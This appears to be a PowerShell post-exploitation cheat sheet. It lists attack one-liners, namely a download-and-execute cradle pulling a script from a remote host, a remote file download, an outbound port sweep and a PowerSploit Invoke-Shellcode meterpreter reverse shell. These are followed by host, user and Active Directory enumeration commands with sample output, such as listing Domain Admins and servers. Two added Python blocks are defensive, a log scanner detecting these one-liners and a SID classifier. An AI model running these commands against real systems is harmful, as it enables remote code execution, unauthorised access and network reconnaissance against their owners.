2014-01-24 16:48:11 -05:00

Windows Powershell Commands and Scripts for Post Exploitation

One liners

Download and Execute Remote Powershell Script

iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")

Download and Save File

(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')

Enumerate Allowed Outbound Ports 1-1024 via securitypadawan.blogspot.com

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); $stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Reverse Shell Using PowerSploit's Invoke-Shellcode

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
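From the defender's side, every one-liner above leaves a recognisable string in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, available from PowerShell 5.0). The following scanner is an added example, not code from the original page or from PowerSploit: it runs a small set of regexes for the cradle, download, Invoke-Shellcode and port-sweep patterns listed above over constructed 4104-style records and reports which user produced which hit. The record layout (record, event_id, user, script) and the log lines themselves are assumptions made for the example.

```python
import re

# Constructed sample records in the shape of Event ID 4104 script-block entries
# (assumed layout for this example; real exports carry more fields).
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4104, "user": "CORP\\jdoe",
     "script": 'iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")'},
    {"record": 2, "event_id": 4104, "user": "CORP\\jdoe",
     "script": "(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')"},
    {"record": 3, "event_id": 4104, "user": "CORP\\svc-backup",
     "script": "Get-ChildItem C:\\Backups | Where-Object Length -gt 1GB"},  # benign admin activity
    {"record": 4, "event_id": 4104, "user": "CORP\\jdoe",
     "script": "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force"},
    {"record": 5, "event_id": 4104, "user": "CORP\\jdoe",
     "script": '$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); ...}'},
    {"record": 6, "event_id": 4103, "user": "CORP\\jdoe",
     "script": "Invoke-Shellcode"},  # 4103 is module logging, not a script block: skipped
]

# Detection rules: (name, case-insensitive pattern). Kept loose on spacing and
# casing so trivial re-casing of the cradle does not evade them.
RULES = [
    ("download_cradle_iex",
     re.compile(r"(\biex\b|invoke-expression).*downloadstring\(|downloadstring\(.*(\biex\b|invoke-expression)", re.I)),
    ("webclient_downloadfile", re.compile(r"\.downloadfile\(", re.I)),
    ("powersploit_invoke_shellcode", re.compile(r"\binvoke-shellcode\b", re.I)),
    ("outbound_port_sweep",
     re.compile(r"\d+\.\.\d+\s*\|\s*(%|foreach(-object)?).*\[system\.net\.webrequest\]::create\(", re.I)),
]


def scan_events(events, rules=RULES):
    """Return (record, user, rule_name) for every 4104 record whose script block matches a rule."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        for name, pattern in rules:
            if pattern.search(ev["script"]):
                hits.append((ev["record"], ev["user"], name))
    return hits


def summarize_by_user(hits):
    """Map each user to the sorted list of distinct rules they triggered, for triage ordering."""
    out = {}
    for _, user, name in hits:
        out.setdefault(user, set()).add(name)
    return {user: sorted(names) for user, names in out.items()}


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for rec, user, name in found:
        print(f"record {rec}: {user} -> {name}")
    print(summarize_by_user(found))
```

The benign Get-ChildItem record and the 4103 record produce no hits, which is the point of asserting on event type before matching: module-logging events carry different text and would otherwise inflate the count for the same activity.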

Commands with Sample Output

Hardware

Get BIOS Information

  • Command with arguments: gwmi win32_bios
  • Description: Retrieves BIOS information including system serial number.
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> gwmi win32_bios
      SMBIOSBIOSVersion : 6.00
      Manufacturer : Phoenix Technologies LTD
      Name : PhoenixBIOS 4.0 Release 6.0
      SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
      Version : INTEL - 6040000

Get Drive Information

  • Command with arguments: [System.IO.DriveInfo]::GetDrives()
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

      Name : C:\
      DriveType : Fixed
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 55568087552
      TotalFreeSpace : 55568087552
      TotalSize : 159876850304
      RootDirectory : C:\
      VolumeLabel :

      Name : D:\
      DriveType : CDRom
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : D:\
      VolumeLabel :

      Name : G:\
      DriveType : Removable
      DriveFormat :
      IsReady : False
      AvailableFreeSpace :
      TotalFreeSpace :
      TotalSize :
      RootDirectory : G:\
      VolumeLabel :

      Name : V:\
      DriveType : Network
      DriveFormat : NTFS
      IsReady : True
      AvailableFreeSpace : 259182640616
      TotalFreeSpace : 259182640616
      TotalSize : 827361812256
      RootDirectory : V:\
      VolumeLabel : TestMappedDrive

User Information

Display Username, SID, Last Used

  • Command with arguments: gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto
  • Description: Retrieves information about system users.
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto

      Name            SID                                            LastUseTime          localpath
      ----            ---                                            -----------          ---------
      WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
      WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
      WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
      WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...

Translate SID to Username

  • Command with arguments: ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value
  • Output:
    • **Windows 7:**
      PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-1000")).translate([System.Security.Principal.NTAccount])).value
      WIN-244VDGE5OGH\johndoe
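Reading the SID columns in the two outputs above is quicker when the structure is explicit: S-1-5-18/19/20 are the fixed service identities, S-1-5-21-&lt;three values&gt; is a machine or domain identifier, and the final component (the RID) distinguishes built-in principals such as Administrator (500) from accounts created later (1000 and up). The following parser and classifier is an added example, not code from the page; the well-known SID and RID tables are standard Windows values, and the sample SIDs are the ones shown in the output above.

```python
from dataclasses import dataclass

# Fixed, machine-independent SIDs that appear in the Win32_UserProfile output.
WELL_KNOWN_SIDS = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM (LocalSystem)",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}

# RIDs with a fixed meaning inside any S-1-5-21-... machine or domain SID.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 512: "Domain Admins",
                   513: "Domain Users", 519: "Enterprise Admins"}


@dataclass(frozen=True)
class Sid:
    revision: int
    authority: int
    subauthorities: tuple

    @classmethod
    def parse(cls, text):
        """Parse 'S-R-A-s1-s2-...' into its components; raises ValueError on malformed input."""
        parts = text.strip().split("-")
        if len(parts) < 3 or parts[0].upper() != "S":
            raise ValueError(f"not a SID: {text!r}")
        # base 0 also accepts the hex form used when the authority does not fit in 32 bits
        return cls(int(parts[1]), int(parts[2], 0), tuple(int(p) for p in parts[3:]))

    def __str__(self):
        return "-".join(["S", str(self.revision), str(self.authority), *map(str, self.subauthorities)])

    @property
    def rid(self):
        return self.subauthorities[-1] if self.subauthorities else None

    @property
    def domain_sid(self):
        """The S-1-5-21-x-y-z prefix identifying the machine or domain, or None."""
        if self.authority == 5 and len(self.subauthorities) == 5 and self.subauthorities[0] == 21:
            return Sid(self.revision, self.authority, self.subauthorities[:4])
        return None


def classify(text):
    """Describe a SID string in analyst-friendly terms."""
    sid = Sid.parse(text)
    name = WELL_KNOWN_SIDS.get(str(sid))
    if name:
        return name
    dom = sid.domain_sid
    if dom is None:
        return "unclassified SID"
    rid = sid.rid
    if rid in WELL_KNOWN_RIDS:
        return f"built-in {WELL_KNOWN_RIDS[rid]} (RID {rid}) in {dom}"
    if rid >= 1000:
        return f"user-created principal (RID {rid}) in {dom}"
    return f"other well-known RID {rid} in {dom}"


def same_domain(a, b):
    """True when two SIDs share the same machine/domain prefix (local vs. domain account check)."""
    da, db = Sid.parse(a).domain_sid, Sid.parse(b).domain_sid
    return da is not None and da == db


if __name__ == "__main__":
    for s in ("S-1-5-18", "S-1-5-21-1319606305-3131390644-2280705280-1000",
              "S-1-5-21-2027135834-1792351174-2509185371-500"):
        print(s, "->", classify(s))
```

Comparing the -1000 profile SID against the Domain Admins entry with same_domain shows they belong to different issuers, which is the quickest way to tell a local account on WIN-244VDGE5OGH from a domain principal when the NTAccount translation is not available (for example when reading an exported log offline).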

Using the PowerShell Active Directory Modules

Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/

Setting Credentials

Query to List "Domain Admins"

  • Command with arguments: Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"
  • Output:
    • **Windows 7:**
      distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
      name : Administrator
      objectClass : user
      objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
      SamAccountName : Administrator
      SID : S-1-5-21-2027135834-1792351174-2509185371-500

Enumerate All Servers on Domain

  • Command with arguments: Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(operatingSystem=*Server*))" | select name
  • Output:
    • **Windows 7:**
      name
      ----
      PWNT-DC
      Exchange1
      SharePoint1